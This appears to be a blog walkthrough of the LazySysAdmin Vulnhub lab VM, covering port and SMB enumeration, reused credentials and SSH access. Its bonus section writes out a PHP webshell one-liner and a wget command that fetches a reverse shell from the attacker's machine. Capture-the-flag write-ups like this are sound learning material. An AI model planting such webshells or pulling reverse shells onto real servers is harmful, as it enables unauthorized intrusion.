Here is my solution to the LazySysAdmin Vulnhub VM.
As usual, start by getting the IP of the VM.
A quick Nmap scan reveals what ports and services we can focus our efforts on. We find ports 22, 80, 139, 445, 3306 & 6667 open. There is also robots.txt which exposes a few directories we can explore.
I began my search with investigations into SMB. I ran the smb-enum-shares.nse script with Nmap to see if we could find any goodies.
Looks like potentially read/write access to /var/www/html??? Looking into this further, I didnt have anonymous write access, but we could read a great deal in the /var/www/html folder!
There were a few goodies here, a few of which are summarised below.
- deets.txt – Password = 12345 (can possibly use this later if we find a username)
- wordpress/wp-config.php – MySQL credentials Admin:TogieMYSQL12345^^
There was no write access available here so if we’re going to pop a reverse shell it might just require a little more effort.
Investigations turned to the web (80) service next.
First i ran ‘dirb’ to try and find any other web directories that werent specifically mentioned in the robots.txt file. (dirb http://10.1.0.4 /usr/share/wordlists/dirb/common.txt)
We find some interesting directories as below
Visiting the /phpmyadmin directory, I find that the creds obtained from the wp-config.php file work to login, but dont seem to provide access to anything.
Bummer. Time to go deeper. Looking at the wordpress install, we appear to be able to login with the previously obtained MySQL credentials.
Investigating the Admin user we find his name is “Togie”. This is also smeared all over their first “Hello world” post. Maybe Togie is our lazysysadmin. Trying the previously obtained credentials “12345” we are able to login as this user through SSH.
Awesome, that was easy!
FOR BONUS POINTS
If this didnt work i was going to inject a basic webshell into a .php page using the wordpress editor (<?php echo system($_GET[‘cmd’]); ?>)…
And then use that page to pull down a reverse shell from my Kali machine, (wget http://10.1.0.5/shell.txt; mv shell.txt shell.php; ls -lah) to confirm it was uploaded…
And then execute that through the browser. I tried this and it did also work so there is an extra way of getting in (low priv as www-data)
But, back on topic, SSH access as togie! Once logged in as togie, we check if we can run anything good with a “sudo –list”, and yep, we can!
Total time spent: Approx 1.5 hours
This was a fun and pretty simple one to knock over. Thanks for the challenge Togie Mcdogie 🙂